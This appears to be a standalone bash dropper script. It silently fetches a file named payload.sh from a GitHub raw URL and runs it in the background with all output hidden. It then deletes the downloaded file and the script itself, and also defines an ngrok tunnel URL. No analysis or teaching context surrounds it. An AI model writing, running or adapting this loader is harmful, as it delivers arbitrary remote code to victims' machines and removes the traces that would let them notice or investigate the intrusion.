#!/bin/bash

NGROK_URL="https://directly-hippopotamic-berniece.ngrok-free.dev"
EXEC=$(mktemp /tmp/install.XXXXXX)

curl -s -L -H "Cache-Control: no-cache" "https://raw.githubusercontent.com/YOURUSER/payload-repo/main/payload.sh" -o "$EXEC"

chmod +x "$EXEC"
nohup bash "$EXEC" >/dev/null 2>&1 &

sleep 2 && rm -f "$EXEC" "$0"
